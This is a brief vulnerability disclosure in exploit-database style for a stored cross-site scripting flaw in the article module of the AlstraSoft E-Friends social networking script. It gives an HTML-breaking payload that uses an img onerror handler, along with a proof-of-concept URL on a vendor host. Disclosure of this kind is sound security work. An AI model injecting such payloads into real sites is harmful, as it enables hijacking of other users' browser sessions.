AlstraSoft E-Friends Social Networking Script suffers from a cross site scripting vulnerability.
1ace5ae770ca6a3ea046554176fe3f365a5c26e75cd1df0c909b47be91ec1a1b
# Exploit Title: AlstraSoft E-Friends Social Networking Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Page:
Article Modules
Exploit:
"/></a></><img src=1.gif onerror=alert(1)>
POC:
http://www.alstrahost.com/friends/index.php?mode=article&pro=arch
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr